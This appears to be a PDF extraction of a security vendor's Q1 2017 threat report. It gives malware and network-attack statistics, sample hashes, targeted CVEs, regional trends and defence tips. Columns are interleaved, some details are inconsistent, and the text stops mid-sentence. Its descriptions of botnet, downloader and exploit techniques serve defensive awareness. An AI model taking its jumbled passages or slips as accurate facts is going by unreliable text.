Internet Security Report QUARTER 1, 2017 Contents
Contents The Firebox® Feed provides 03 Introduction
quantifiable data and trends 04 Executive Summary about hackers’ latest attacks, and 05 Firebox Feed Statistics understanding these trends can 07 Malware Trends help us improve our defenses. 08 Quarter-over-Quarter Malware Comparison 08 Malicious JavaScript Still Menaces 09 A Rise in Linux Malware 11 Evil Cross-platform Java Malware 11 Old Attacks: Malicious Perl Bot 12 A Pair of Generic Windows Trojans 12 Malicious Macros Hide in the Weeds 13 Geographic Malware Distribution 14 Zero Day vs Known Malware
15 Network Attack Trends
15 Top Network Attacks 16 Quarter-over-Quater Attack Comparison
A B 16 Web Battleground Shifts to Servers 16 Web Application Attacks Move Up Reset
A B 17 StageFright Returns to the Spotlight
Reset 18 Geographic Attack Distribution
20 Firebox Feed Statistics: Defense Learnings 20 Malicious JavaScript in Email 20 Web-based Linux Malware 20 Brazilian Banking Malware Campaign
21 Top Security Incidents 22 The CIA Vault 7 Leaks 25 Marble Framework Defense Learnings
26 WatchGuard Threat Lab’s IoT Research Project 27 Responsible Disclosure: Ouvis C2 HD Security Camera 31 IoT Research: Defensive Learnings
32 Conclusion & Defense Highlights
Internet Security Report: Q1 2017 • 2 Introduction
The report for Q1 2017 Introduction includes: Have you ever wondered what Many trends and discoveries from types of cyber attacks affect small 05 the Firebox Feed to midsize businesses (SMBs) and What types of malware do we catch most often in the wild? Which network services do distributed enterprises (DEs)? Well, attackers commonly target? What are the you’ve come to the right place. most popular attacks in different regions of the world? Which delivery mechanisms do cyber WatchGuard’s Internet Security Report is based on criminals most regularly rely on? You can learn Firebox Feed data coming from more than 26,000 all this and more in our Firebox Feed Statistics unified threat management (UTM) appliances that section. are monitoring and protecting SMBs and distributed enterprises around the world. This data gives us Top Story: CIA Vault 7 leaks Every quarter, you’re flooded with interesting insights into what types of network exploits, malware 11 and relevant information, security stories and infections, and advanced attacks are launched by incidents. Some of them can have industry- cyber criminals every month, and how they change wide effects. This quarter our researchers and update their attacks over time. We share these comment on the CIA Vault 7 leak from Q1 2016 trends and insights with you every quarter in our and share some additional technical analysis Internet Security Report. you didn’t see in the news. Latest Internet of Things (IoT) 22 research The WatchGuard Threat Lab constantly runs security research projects to study the threats and issues affecting businesses today. For the last few quarters, our researchers have been analyzing the security of consumer IoT devices. This quarter we disclose a vulnerability we found in the Ouvic C2 HD Security Camera. Most importantly, defensive learnings 33 While some might consider the threat landscape interesting on anecdotal merit alone, you can put these trends and learnings to good use. We share these trends and findings so that you can cater your defenses to the latest attacks. We share various protective tips throughout this report, and summarize with our top learnings.
We’re excited to share our second report based on data analysis from our Firebox Feed, and our additional re- search projects. We believe this quantifiable data gives us a deeper insight into the most prevalent threats our customers face and how cyber criminals craft their latest attacks. Our quarter-over-quarter analysis also shows how attackers evolve their techniques and focuses over time. We hope this report provides useful information, and you make it a regular part of your InfoSec awareness and training. Thanks for joining us this quarter, and read on for our latest threat landscape findings.
Internet Security Report: Q1 2017 • 3 Summary Executive Summary Even when malware declines, other attacks rise. Consumers and businesses are under the constant deluge of network attacks, phishing, and malware. Criminals target Brazilian banks, nation-states anonymize their tools, and advanced threats get past legacy defenses. If you want to keep your business online, you need to stay vigilant against these attack trends so you can identify defenses for them.
This report provides some details around those and other trends. Here’s a high-level summary of some of the things you’ll learn from this report:
• Linux malware is on the rise, making up 36% of the top malware we detected in Q1 (if you count PERL/Shellbot). We believe this increase comes from attackers targeting IoT devices.
• Legacy AV missed 38% of malware. In Q4, signature-based AV missed 30% of the threats we caught overall. This quarter, those misses increased 8% despite a general decline in malware detection overall. This means increasingly more malware evades traditional AV solutions.
• Threat actors take a break from hacking the holidays. Overall, threat volume decreased 52% in Q1 2017 compared to Q4 2016. We believe the drop in malware detections can be attributed to the absence of seasonal malware campaigns associated with various Q4 holidays, which increased overall malware instances during that period.
• Conversely, network attacks are up 37% compared to Q4, likely due to automated tools that always look for new victims.
• The web battleground shifted towards web servers. Last quarter, we saw more exploits that were used for drive-by downloads (web client attacks). In Q1, 82% of the top network attacks targeted web servers (or other web-based services).
• Our top ten XSS attack primarily targeted Spain. We aren’t sure why this particular cross-site scripting exploit was popular in Spain, but it was.
• Attackers still exploit the Android StageFright flaw. A mobile device vulnerability cracked our top ten attack list this quarter, breaking the previously unchallenged web attack theme.
• Criminals target Brazilian banks with cross-platform malware. We detected a large amount of email- based Java malware sent to victims in Brazil. We suspect this is part of the well-known Banloader banking malware campaign.
Those are just a few of the many trends this report explores. Read on for more in-depth explanations and
7,072,178 In Q1, 2017 malware variants WatchGuard (266 per device)* blocked over 4,151,210 malware variants (156 per device)* * average per participating device Internet Security Report: Q1 2017 • 4 Firebox Feed Statistics
Internet Security Report: Q1 2017 • 5 Firebox Feed Statistics Firebox Feed Statistics The threat landscape does not stand still. Cyber criminals constantly change their tools, tactics, and campaigns to exploit the most opportune attack techniques of the time. Savvy attackers pay attention to seasonal events, pop culture, and other technological trends to leverage the latest tricks to hack more victims. To keep up your defenses, you must remain aware of the latest threat trends. Using this report, you can fine-tune your defenses to block the latest threats. WatchGuard’s Firebox Feed provides quantifiable The Firefox Feed currently only captures data data about the latest malware and network attacks from a fraction of our customers, since it relies globally. The feed is a database of anonymized on customers running the latest versions of our threat data gathered from tens of thousands of firmware. However, with information from over active Fireboxes around the globe. It records the 26,000 devices, the Firebox Feed provides a statistically relevant view into today’s threats. latest malware from our Gateway AntiVirus (GAV) and APT Blocker services, and it archives the most This section of the report highlights the malware and prevalent network attacks blocked by our Intrusion network attack trends our Firebox Feed uncovered in Prevention Service (IPS) service. It also records Q1 2017. Here we share our analysis of these trends, location data to learn how different threats affect and provide defense tips that help you avoid the different geographic regions. It doesn’t, however, latest malware and attacks. capture any sensitive data about our customers’ networks or configurations, and allows customers to optout of this feed whenever they like.
The information from over 26,000 devices, the Firebox feed provides a statistically relevant view into today’s threats.
This section of the report highlights the malware and network attack trends our Firebox Feed uncovered in Q1 2017. Here we share our analysis of these trends, and provide defense tips that help you avoid the latest malware and attacks.
Internet Security Report: Q1 2017 • 6 Firebox Feed Statistics
Malware Trends
Most cyber attacks involve malware. After breaching your network, criminals usually want to establish “persistence,” meaning they want to find a way to retain access to your computer and network. Typically, they install malware to retain this persistence. This section details the malware-specific trends from our Q1 2017 data.
Let’s start with the raw Q1 2017 numbers:
• The Firebox Feed recorded threat data from Our malware data comes from two 26,584 active Fireboxes; a 7.7% increase in Firebox services: devices reporting in Q4 2016. • The basic Gateway AntiVirus (GAV) service, • Our GAV service blocked 7,072,178 malware which uses signatures and static heuristics to variants; representing an average of 266 malware catch known malware. samples blocked per Firebox. This represents a • APT Blocker, our advanced malware prevention 52% decline in overall malware compared to last service, which uses behavior detection to catch quarter, and a 56% decline in malware blocked new or “zero day” malware. per Firebox.
• APT Blocker stopped an additional 2,568,727 malware variants; representing a 34% decline Figure 1: Top Ten Firebox GAV Hits for Q1 2017 from last quarter.
COUNT THREAT NAME CATEGORY Looking at those numbers, the first thing you notice is malware detection dropped by about half, despite 670,261 FakeAlert Generic Dropper the Firebox Feed having almost two thousand more devices reporting in. Why is that? 356,809 PERL/ShellBot PERL IRC Bot We suspect this decline has to do with the seasonality of malware campaigns. The last quarter 256,390 JS/Downloader.Agent Malicious JavaScript of the year includes many regional and global holidays, such as Thanksgiving and Christmas. Many Linux/Exploit Generic Linux Trojan of these holidays involve major shopping periods and 178,551 retail events like Cyber Monday and Black Tuesday. Due to this increased spending, attackers specifically 165,996 Win32/Heur Generic Trojan target these holiday and shopping periods, which probably attributes for the higher malware rates last 158,689 Linux/Downloader Generic Linux Downloader quarter. As we continue our report annually, we’ll follow this trend to see if holiday-related malware increases are common year-over-year. 156,645 JS/Heur Malicious JavaScript
Besides the obvious decrease in overall malware, we Java/Downloader Generic Java Downloader also noticed a relative increase in advanced malware. 83,123 While APT Blocker detections decreased in Q1, they decreased relatively less compared to the decline in 82,127 Linux/Flooder Generic Linux DDoS Tool GAV detections (a 34% decline compared to GAV’s 52%). In general, that means more malware got 77,704 Generic36.AAVT Generic Bitcoin Miner past legacy AV this quarter, and required advanced
Internet Security Report: Q1 2017 • 7 Firebox Feed Statistics
malware detection techniques to block. This seems to suggest that more threat actors are actively Network vs Endpoint Malware Detection: creating malware that evades legacy protections. To evade detection technologies, modern malware Rather than analyzing these ten samples individually, arrives in multiple stages. Rather than directly sending we’ll share the high-level trends they represent, and you ransomware, attackers might send you a document, go into more detail about some of the samples. that links to a website, that opens a malicious Java file, that installs a dropper or downloader, which finally downloads the actual ransomware onto the endpoint.
Quarter-Over-Quarter This means network AV solutions detect and block Malware Analysis malware at different stages in this deliver process than Only four of the malware samples from our Q4 2016 endpoint AV. Network AV primarily “sees” the initial report made it to this quarter’s top ten. Specifically: droppers and downloaders from initial infection stages. Whereas, endpoint AV may see the final malware. • FakeAlert For more on multi-stage malware, see this great post from IBM X-Force. • Linux/Exploit
• JS/Downloader.Agent
• JS/Heur Two of those threats traded places for relevance. As mentioned before, malicious JavaScript is either Last quarter, Linux/Exploit was the number one hosted directly on a malicious website to facilitate drive-by-download attacks, or delivered as an threat, and a good indicator of increased IoT attacks. attachment in a convincing phishing email. In the This quarter, it’s still relevant, but has dropped below email scenario, JavaScript malware typically acts FakeAlert, which took over the top spot. If you’d like as the first-stage dropper in a multi-stage attack. to know about either of these two samples, see the Malware authors hope their victims run the malicious malware section of last quarter’s Internet Security JavaScript so it can download the second stage Report. Meanwhile, the top JavaScript threats from malware, which might be ransomware or a remote last quarter remain as relevant this quarter, which we access trojan (RAT). detail next. In the case of web attacks, criminals use JavaScript to launch browser and software exploits. In fact, Malicious JavaScript Still some of the samples our Fireboxes detected are associated with web-based exploit kits like Angler, Menaces Neutrino, and Rigs, which have previously delivered JavaScript is a high-level scripting language most ransomware like Locky and Nemucod. commonly used on dynamic websites. While web applications legitimately use JavaScript, attackers Our data shows that malicious JavaScript plays a commonly abuse it to help deliver malware. big role in modern malware delivery, both over the Specifically, criminals tend to exploit malicious web and through email. Make sure you have security JavaScript in two ways; either as malicious code controls that can identify malicious JavaScript, embedded on a website, or as malicious files sent via including web reputation and advanced malware email. protection services. We also encourage advanced users to look into extensions like NoScript and For the second quarter in a row, JavaScript malware SafeScript, which can help you limit JavaScript while made up a large portion of the Firebox Feed top also letting legitimate sites work. Finally, make sure statistics. Like last quarter, JS/Downloader.Agent and your users know never to open .JS files from an JS/Heur both made our top ten list. Furthermore, we email. continued to see many other malicious JavaScript samples throughout our full top 100. In short, our malware services block a lot of malicious JavaScript.
Internet Security Report: Q1 2017 • 8 Firebox Feed Statistics
A Rise in Linux Malware 2. Linux/Downloader joined the top ten malware At least three of the top ten malware samples this list this quarter. Linux/Downloader is a signature quarter target Linux, showing that cyber criminals that generically catches common Linux dropper are focusing on this platform, likely for IoT-related or downloader shell scripts. Rather than catching attacks. malicious Linux executables (ELF files) like Linux/ Exploit, this signature catches the malicious shell Last quarter, Linux/Exploit was the number one scripts that some attackers (or trojans) run to malware sample blocked. While it dropped to download and install additional malware onto a number four this quarter, it’s joined by two other hijacked Linux device. Linux threats; Linux Downloader and Linux Flooder. Combined, these three hits show attackers are Linux runs on many different architectures, such increasingly targeting Linux systems. as ARM, MIPS, and traditional x86 chipsets. An executable compiled for one architecture will not run on a device running a different Here’s a quick description of each threat: one. Thus, some Linux attacks exploit dropper shell scripts to download and install the proper 1. Linux/Exploit is a generic detection rule that malicious components for the architecture they catches several executable Linux (ELF) trojans. are infecting. Here’s a sample of one of the You can read more about it in our last report. many Linux downloader scripts caught by this In general, these trojans infect a device, and signature. then scan networks looking for any other devices hosting Telnet or SSH services. Once the Telnet or SSH host devices are identified, the trojan attempts to log in to them using default credentials or via brute force. Once RECENT SAMPLES: they have access, they hijack the device by 78fae3e208de3bbadabe09f4996f0b44 either downloading a copy of a malicious Linux executable (which could be Linux/Exploit) or cac62e5664152a357145747ba5dbe0a2 by running a script to add the host to a growing 9a539a2aec2a815218abdf5c35b10c33 botnet (a la Mirai botnet). c92a0be3ff38cd24478ffcf8e35099c3 1a3029ed85c90411668583a9e271f0f5
ALTERNATE NAMES: RECENT SAMPLES: c9c50c4b28d5209c2366ac4ec531ae0c Linux/TrojanDownloader 2 a3b3572cccac880e33420316562814ce Linux/ShellDLoader e9b5716cac7e5e0df3a209456294a34c 1 Trojan-Downloader.Shell.Agent
ALTERNATE NAMES: Linux.CornelGEN Script.Trojan.Agent
Figure 2: Example of malicious Linux shell script caught by Linux/Downloader
Internet Security Report: Q1 2017 • 9 Firebox Feed Statistics
3. Linux/Flooder also joined the Q1 top ten malware list. This is another generic signature that catches Linux-based distributed denial of service (DDoS) tools. For instance, it catches tools like the publicly released Tsunami tool. Tsunami is a command line Linux tool designed to carry out DNS amplification attacks. It’s based on an open source DNS relay scanner called namescan. This is one of the many possible Linux-based CLI DDoS tools.
Linux/Flooder may also catch the DDoS tools used by Linux-based botnets, like Mirai. As the Mirai botnet showed us, Linux-based IoT devices are a prime target for botnet armies. These networked trojans often include tools for DDoS attacks, as shown below. Figure 3: Mirai Command and Control Server
As an aside, one might argue that the PERL/ShellBot RECENT SAMPLES: variant we describe below also qualifies as Linux malware, since it primarily targets Linux systems. 3c0e9dbc29b74445664814b10b2ced82 This is because they tend to have Perl installed by bb326e31fdfc533e3e5293df13bb091a default. However, we decided to leave it out of this e64079b3ccf906204474beca1f5cc41d section, and describe it in more detail later in this 3 report. cc38121ea8efc86bcc5d446e2f7e4198 In summary, Linux attacks and malware are on the ALTERNATE NAMES: rise. We believe this is because systemic weaknesses Dos.Linux.Agent in IoT devices, paired with their rapid growth, are steering botnet authors towards the Linux platform. Linux.Flood Owners of Linux-based devices, including IoT hosts Trojan.Linux.Flooder and traditional Linux servers, should ensure they Linux/Dnsamp properly secure their systems from external attacks. Blocking inbound Telnet and SSH, along with using Linux.BackDoor.Tsunami complex administrative passwords, can prevent the vast majority of potential attacks.
Linux
Internet Security Report: Q1 2017 • 10 Firebox Feed Statistics
Evil Cross-platform Java Old Attacks: Malicious Perl Malware Shellbots Java is a general-purpose programming language Last quarter, an old-style threat called a PHP that is designed to run on many platforms. webshell made our top ten malware list. This quarter Originally created by Sun Microsystems (now that threat dropped entirely off our top 100 list, owned by Oracle), Java is one of the most popular only to get replaced with another outdated threat – programming languages used today. Everything from PERL/ShellBot. web applications, to mobile devices, to normal client software uses Java. People often confuse Java for PERL/ShellBot is a broad signature made to Javascript, but they are quite different. Javascript is detect malicious bots written in Perl (a high-level a high-level, runtime scripting language. programming language). Though Perl bots can run on any platform with Perl installed, they tend to Unfortunately, Java has also developed a reputation affect Linux computers because they often install of insecurity. Over the years, researchers have Perl by default. found countless vulnerabilities in the Java platform, many of which allow attackers to bypass its These malicious bots use the Internet Relay Chat built-in sandbox, which is there to protect users. (IRC) service as a command and control (C&C) Furthermore, sophisticated attackers are drawn channel for the attacker. Some of these malicious to Java because it runs equally well on Windows, Perl shellbots connect to IRC using the default port, Mac, and Linux devices. Attackers exploit Java 6667. However, others use non-standard IRC ports downloaders in cross-platform attacks. like 23, or 3333, presumably to help avoid detection.
While Java threats were very common a few years Like a normal botnet, attackers can leverage Perl ago, this is the first time we’ve seen a Java threat bots for just about any nefarious purpose, including make our top ten list. Java/Downloader is a universal but not limited to DDoS attacks. Source code for signature that detects generic Java downloaders. many Perl Shellbots have leaked publicly, resulting These bits of malicious code try to fingerprint a in many variants based on the originals. Below is a victim’s operating system (OS), and then install the Github for one such sample used in for DDoS attacks. corresponding malicious payload.
The most recent samples caught by Java/ PERL/SHELLBOT INFO: Downloader are associated with a cross-platform • Perl-based IRC bot trojan called Banload, which targets South American banks. This banking trojan infects both Windows and • Related to ShellShock attack Macintosh computers using this malicious Java code. • Sample hashes: Our geographic data confirms this increase likely 59b0f479a5ad937dd9d61635c4c855bc relates to a South American bank attack campaign. 66d85817e183b3e5120149721d3fcc19 We’ll share more about this in our Geographic 1d37072882034f5a015fd3430f8169a7 Distribution section. 8a838c86c038713b083b6fc07208ebc3 fe3323a44f0f536b94947dce2b229fc4 JAVA/DOWNLOADER INFO: • Generic Java downloader • Alternate names: Backdoor.Perl.Shellbot • Related to banking malware (Banload) Unix/ShellBot • Sample hashes: Trojan.Perl.Shellbot 2c1189b57ff0cfdd18618f51955df8f1 cb6d19921c635683798b4dcc86fe607f 4478732742b8ccbf252cbb71766eb86 f27b92b58f510932cd117c4248955c9 e9d0672646d0478b0b3a8a3d334ee32 ccfcf52d14a07e2d7fb780809e6b6b73
• Alternate names: Java.Trojan.Generic Java:Malware-gen Java/Banload.U Mal/DrodZp-A Internet Security Report: Q1 2017 • 11 TrojanDownloader.Java Firebox Feed Statistics
Figure 4: Example of publicly available DDoS Perl bot
In late 2014, a critical Linux Bash vulnerability sur- Malicious Macros Hide in the faced called ShellShock. This flaw made it trivial for Weeds attackers to gain full root privileges on any Linux Unlike last quarter, malicious macro-based Word server that exposed Bash. At the time, attackers documents did not make our top ten list. There was a updated their malicious Perl bots to target this clear decline in overall malicious macro documents in ShellShock vulnerability. Some of the samples we see Q1. However, they’re still worth mentioning since we associated with recent PERL/ShellBot detections are see these malicious documents sprinkled throughout targeting this ShellShock vulnerability. If you haven’t our wider top 100 list. already patched your Linux systems for ShellShock, you should do so immediately. Despite their decline, we recommend you continue to warn your users against unsolicited documents, A Pair of Generic Windows and tell them not to enable macros if they do open Trojans strange documents. See our last report for more To round out our top ten list, we also saw a pair of information on this waning threat. signatures that catch generic Windows trojans.
• Win32/Heur is about as generic a signature as you get, and is known to catch many Windows- based trojans, from Zbot and Zeus to Razy.
• Generic36.AAVT is also a broad signature that catches Windows-specific malware. However, it’s more specifically associated with Bitcoin Miner trojans. This suggests a slight uptick in attackers delivering Bitcoin mining malware in some regions.
Internet Security Report: Q1 2017 • 12 Firebox Feed Statistics
Geographic Malware 2. 84% of Win32/Heur was found in India. Distribution 3. The generic Bitcoin miner (Generic36.AAVT) Overall, we see more malware blocked in EMEA than primarily targeted Canada, with 95% of the anywhere else, with over 56% of malware caught in detections. this region. This continues the same overall regional trend from last quarter. While this could have to do 4. 97% of our Java/Downloader detections were with the sales and licensing of our products (APT from Brazil, confirming this threat is associated Blocker is popular in Europe), it could also suggest with a known banking malware campaign criminals are launching more European malware targeting Brazilian banks. campaigns. 5. The Linux threats display a wide range of Our regional trends change for the remaining per- geographic curiosities. centage of malware though. Last quarter, most of a. Linux/Exploit affected many European and the remaining malware affected the Americas, with American countries, but had the highest only 6% of malware found in APAC. This quarter, numbers in the U.S. and United Emirates. the remaining malware is split evenly between the Americas and APAC, at approximately 22% each. This b. Linux/Downloader mostly affected Germany, marks a significant increase in threats affecting the Great Britain, and Malaysia, but few others Asia-Pacific. to the same extent.
We also saw quite a few standout geographic trends c. Finally, Linux/Flooder primarily affected for individual malware variants: Germany and France.
1. We primarily found PERL/ShellBot in two 6. The JavaScript malware was found in a wide countries. 53% of the hits were found in Malaysia, range of countries, but Germany always lead the 36.7% were found in the United States, and the list. remaining 10.3% was distributed throughout eleven other countries. It’s unclear why these 7. Though FakeAlert was found in over 100 Perl bots are primarily targeting Malaysia and the countries, 44% came from Italy. United States. Malware affects all countries to some extent, but it is interesting to see certain threats only affect specific countries or regions. Pay close attention to the most prominent threats by region, and consider adjusting Figure 5: Malware detection by region your defenses accordingly.
EMEA 56.6% APAC AMERICAS 21.8% 21.6%
Though FakeAlert was found in over 100 countries, 44% came from Italy.
Internet Security Report: Q1 2017 • 13 Firebox Feed Statistics
Zero Day vs Known Malware That said, not all our customers have APT Blocker. As mentioned in the sidebar above, Firebox custom- For a one-to-one comparison, we count the total ers can also use our optional APT Blocker service GAV hits only on boxes that have APT Blocker. to catch more advanced malware. APT Blocker runs According to our Firebox Feed, GAV found 4,198,242 suspicious files in a next-generation cloud sandbox, known malware variants on boxes that also had APT and monitors their behaviors to identify zero day Blocker. Meanwhile, APT Blocker prevented 2,568,021 malware that would be missed by signature-based new malware variants on these same devices. This detection solutions. When our GAV service doesn’t means at least 38% of the malware our systems detect anything bad, our Firebox can still run addi- discovered was zero day, and missed by legacy AV tional APT Blocker checks to find brand new threats. solutions.
By definition, if APT Blocker catches a threat, signa- This illustrates the critical importance of advanced, ture-based GAV missed it. By comparing these two behavioral-based malware detection solutions today. services, you get a good idea of the ratio between Without them, AV solutions could miss more than newer “zero day malware,” which legacy AV solutions one third of the malware spreading online. This is might miss, compared to known malware. why so many networks that use basic AV become victims of threats like ransomware. We highly recom- mend you leverage advanced malware solutions like WatchGuard’s APT Blocker.
Figure 6: Known vs Zero Day Malware
38% OF MALWARE WAS ZERO DAY
GAV found 4,198,242 known malware variants on boxes that also had APT Blocker. Meanwhile, APT Blocker prevented 2,568,021 new malware variants on these same devices.
Internet Security Report: Q1 2017 • 14 Network Attack Trends Network Attack Trends
To deliver malware, attackers must either rely on the mistakes of users, or take advantage of vulnerabilities found in network software. In the case of software vulnerabilities, WatchGuard’s Intrusion Prevention Service (IPS) is designed to detect these client and server-side exploits, and prevent them from working. This section of the report highlights the top network attacks.
At a high level, our IPS service blocked 4,151,210 Below are the top network threats seen during this network attacks, which averages to 156 intrusion period. attempts per Firebox customer. This represents around a 37% increase in the overall blocked network Rather than analyzing each individual exploit (see attacks this quarter compared to Q4. While cyber the links in the chart if you want more detail), let’s criminals may not have launched as many massive look at quarter-over-quarter differences and overall malware campaigns, it appears that other types of trends. attacks are on the rise.
Figure 7: Top Ten IPS Hits Q1 2017
40.6% 14.7% 9% 9% 8.8% 5.3% 3.8% 3.6% 2.8% 2.4% WEB URI WEB HTTP WEB Nginx WEB HTTP WEB Cross-site WEB Brute WEB-CLIENT WEB-CLIENT WEB-CLIENT Android Handler Buffer Basic Auth HTTP_parse_ Host Header Scripting -36 Force Login -1 Javascript WEB NetBSD Suspicious libstagefright Overflow - Header Buffer chunked Buffer Buffer Overflow Obfuscation in tnftp fetch_url HTML Iframe mp4 tx3g Atom POST - 1 Overflow Overflow(1) EKs - 75 Command Tag(4) Multiple Buffer Execution(2) Overflow -1
Threat Affected CVE Signature Name Category Products Number Count
WEB URI Handler Buffer Web Server Windows web serverss CVE-2011-1965 532,565 Overflow - POST -1
WEB HTTP Basic Authorization Web Server All web servers CVE-2009-0183 192,899 Header Buffer Overflow
WEB Nginx HTTP_parse_chunked Web Server Nginx CVE-2013-2028 118,576 Buffer Overflow(1)
WEB HTTP Host Header Web Server Apache CVE-2003-0245 117,706 Buffer Overflow
WEB Cross-site Scripting -36 Web Client Any web application CVE-2011-2133 115,446
WEB Brute Force Login -1 Web Server Web app logins n/a 68,806
WEB-CLIENT Javascript Web Client All web browsers Multiple CVEs 49,376 Obfuscation in EKs - 75 WEB NetBSD tnftp fetch Web-based FTP tnftp (Apple, NetBSD, Linux) CVE-2014-8517 47,076 _url Command Execution(2)
WEB-CLIENT Javascript Web Client All web browsers n/a 36,874 Command Execution(2)
Android libstagefright mp4 tx3g Android buffer Android OS CVE-2015-3824 31,085 Atom Multiple Buffer Overflow -1 overflow
Internet Security Report: Q1 2017 • 15 Network Attack Trends
Quarter-Over-Quarter 1. WEB Cross-site Scripting – 36: A web Attack Analysis application (app) vulnerability is a flaw in the actual web app, and not in the server software. In Q1, six of the network attacks from previous quar- This could include the code making up a common ter return to our top list. At a high level, not much web framework you use, or the custom code has changed with these six attacks. Almost all of you created specifically for your own web apps. them moved up on the list, and they generally retain Common examples of web app flaws include the same order. The only exception is the “Suspicious cross-site scripting (XSS), local and remote HTML iframe tag” issue, which dropped two spots to file inclusion, SQL injection (SQLi), cross-site ninth. While web-based attacks still dominate the top request forgery (CSRF), and many more. threats, the scale has tipped from web client attacks to web server attacks, which we will talk about next. Last quarter, not a single web app vulnerability made the top 10. This quarter, an XSS The Web Battleground vulnerability rose to number five. An XSS attack Shifts to Servers allows an attacker to interact with a web app Last quarter, web attacks dominated our top ten, fill- as if they are the intended end user. However, ing all the spots on our list. This quarter, web threats attackers typically need to trick you into clicking still dominate, but a mobile exploit cracked the top a specially crafted link for the attack to work. 10 for the first time. This quarter also saw a shift in If you do fall for the link, the attacker can gain the type of web attacks. In Q4 2016, 73% of the top access to that web app’s cookies, and any of your web attacks targeted web clients (the browser and other content on that site. its supporting software), not web servers. Now, only three of the nine web threats on the list target web WEB Cross-site Scripting – 36 is one of many clients. In the end, 82% of the top network attacks broad signatures to detect generic cross- target web servers (or web-based services). site scripting attempts against your users. It’s interesting to see web app attacks reach the top This marks a significant shift in the mix of web server 10. We found three additional web app attacks in vs client threats, and that trend extends into the top the top 20 as well. Protecting against XSS attacks 20 as well. While a few more client vulnerabilities is a twofold process, since the vulnerability lies show up in the wider top 20 list, it also includes more in a server web app, but the attack targets a web web server flaws. We don’t think drive-by download client. For web app administrators, you should style attacks will go away, but it appears attackers visit OWASP.org to learn how to develop security have focused their efforts and tools on trying to web apps (a broad topic we can’t cover in a short exploit web server attacks. A couple of new web report). For web users, you should be very careful server attacks also made the list, which we’ll cover clicking unusual links. next. With the increase in web server attacks, we 2. WEB Brute Force Login – 1: While it doesn’t recommend you harden your web servers, use a fire- technically catch a web app vulnerability, the wall to limit access to any internal web services, and Brute Force Login IPS rule does catch an attack keep your server software up to date with the latest that targets the login pages of web applications. patches. If you don’t program login throttling to your web application, attackers can use tools like THC Web Application Attacks Hydra or the Burp Suite to try and brute force Move Up user accounts on your website. This IPS rule can Though many of the web vulnerabilities in the top catch web login brute force attempts by looking threat list remain the same, Q1 saw two newcomers a for repeated connections from the same source web application vulnerability and a login brute force address. attack: With the increase in web app vulnerabilities in Q1, we recommend web administrators audit their source code. As mentioned earlier, OWASP.org is a great resource for learning about protecting your web applications.
Internet Security Report: Q1 2017 • 16 Network Attack Trends
StageFright Returns to If you are worried about this mobile threat, we highly the Spotlight recommend upgrading your Android operating system (if it’s not patched already). Barring that, As previously mentioned, this quarter included some third-party texting applications can mitigate the first mobile-specific exploit to crack the top the risk of StageFright by preventing mobile devic- threats list. StageFright is an exploit that targets es from processing video messages automatically. Android mobile devices and it first earned notoriety These applications will now ask whether you want to in 2015 when researchers publicly disclosed it prior download and play video messages. You should train to the BlackHat security conference. Specifically, your users to treat all unsolicited video messages as StageFright is a buffer overflow vulnerability in the suspicious, and avoid clicking links or downloading Android libStageFright system module, responsible files you don’t expect. for handling video messages in Android mobiles. By sending a carefully crafted video message, an attack- In summary, the web is still the battleground but the er can exploit this buffer overflow to either execute conflict has shifted vulnerabilities from the client to arbitrary code on the mobile device with full root the server. If you are a web administrator, use this as privileges, or at least cause the device to crash. You an excuse to circle back and reevaluate your security can learn more about it in this Daily Byte video. for web servers and applications.
Over the course of 2015, various Android platforms patched StageFright. However, not all users or ven- dors keep their Android installs up to date, so many mobile devices may remain vulnerable. Our Stage- Fright signature catches some of the malicious MP4 files used to trigger this video-handling vulnerability. It’s interesting to see this mobile threat make our top attack list. Nearly two years later, not only is Stage- Fright still present, but it’s prolific.
Internet Security Report: Q1 2017 • 17
By Source (WP:NFCC#4), Fair use, https://en.wikipedia.org/w/index.php?curid=47364979 Network Attack Trends
Geographic Attack Distribution • The top cross-site scripting (XSS) attack The general regional attack trends we saw in Q4 2016 targeted Italy 90% of the time. We haven’t continued this quarter, with the majority of the top attributed it to a specific campaign, but most XSS network attacks happening in EMEA. We did see mar- attacks in our top threat list affect victims in Italy. ginally fewer attacks in APAC and more in the Amer- • NGINX is a popular, open-source web and email icas, but overall, the regional trends look very much proxy server. The NGINX vulnerability in our top like our normalized one from the last report. 10 is an old, but serious, flaw from four years ago. While not as dominating as the examples above, Besides the overall regional trend, our feed data also 53% of the “NGINX HTTP_parse_chunked buffer shows interesting country-specific nuances between overflow” detections come from Germany. the individual top attacks. The remaining hits are spread between 17 other • 96% of suspicious iframes were detected in North countries. America. The Suspicious HTML iframe threat • Likewise, 46% of “JavaScript Obfuscation in overwhelmingly affected North America, with 96% EKs” were found in the U.S. While that may not of the hits falling in the U.S. and Canada. Iframes seem like an overwhelming majority, the addition are legitimate HTML tags designed to create hits we spread sparingly in 45 other countries. frames on a web page. However, web attacks often leverage malicious iframes to redirect victims to a • Finally, 73.6% of the tnftp attacks are split malicious site. If an attacker can hijack a legitimate between Great Britain (42.6%) and Australia website, they often use iframes to force that site’s (31%). By the way, tnftp is a popular FTP client visitors to another site hosting their web exploit for BSD platforms. Though it is an FTP client, kit (EK). We suspect these hits have to do with this vulnerability involves how it connects to increased web attack campaigns in the U.S. and HTTP URLs. We are not sure why attackers are Canada. primarily targeting Great Britain and Australia with these tnftp attacks. Other than sharing a mutual historical ancestry, these countries have little in common.
Figure 8: Malware detection by region
of the tnftp attacks are split between Great Britain (42.6%) and Australia 73.6% (31%).
EMEA
Americas 32% 63.3% APAC 4.7%
of JavaScript Obfuscation in EKs 46% were found in the U.S.
Internet Security Report: Q1 2017 • 18 Network Attack Trends
Though some attacks are global, others target var- • Brazilian banking attack sends malicious Java ious countries differently. You can learn a lot from over email. Like JavaScript, Java is one of the this regional nuance. For instance, our data shows things you might expect to see more over the that if you live in North America, you should look web. However, 99.9% of the Java/Downloader out for web-based attacks and drive-by download malware arrived over email. As mentioned before, campaigns that leverage malicious exploit kits. this attack occurred almost exclusively in Brazil, Meanwhile, if you’re in Spain, beware of XSS attacks, which suggests this malware is associated with a and train your users to avoid clicking suspicious links. well-known attack campaign targeting Brazilian Finally, if you live in the UK or Australia, be sure you banks. The attackers behind that campaign have updated tnftp. send phishing emails that contain malicious .Jar files; sometimes directly attached to the email, but also often compressed within a Zip file. • Malicious JavaScript primarily arrives in emails. The attackers use a malicious Java downloader Like the previous quarter, we saw a significant because it allows them to target both PCs and amount of malicious JavaScript in Q1. JavaScript Macs. was designed for the web, so you might expect to encounter it more there. However, we saw • The Bitcoin mining trojan was entirely delivered more malicious JavaScript in email. Though via FTP. As mentioned earlier, 